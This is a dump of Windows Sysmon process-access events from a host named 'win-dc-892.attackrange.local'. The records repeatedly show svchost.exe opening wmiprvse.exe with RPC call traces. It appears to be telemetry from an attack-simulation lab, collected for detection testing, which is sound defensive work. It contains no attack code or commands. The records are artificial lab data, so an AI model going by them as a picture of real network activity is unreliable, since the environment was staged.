12:02:27.957{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006305Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.957{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006304Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.957{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006303Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.957{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006302Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.957{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006301Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.957{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006300Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.941{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006299Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.941{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006298Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.941{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006297Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.941{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006296Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.941{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006295Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.941{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006294Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.941{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006293Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.941{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006292Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.941{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006291Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.941{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006290Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.941{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006289Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.941{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006288Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.926{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006287Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.926{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006286Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.926{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006285Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.926{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006284Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.926{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006283Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.926{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006282Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
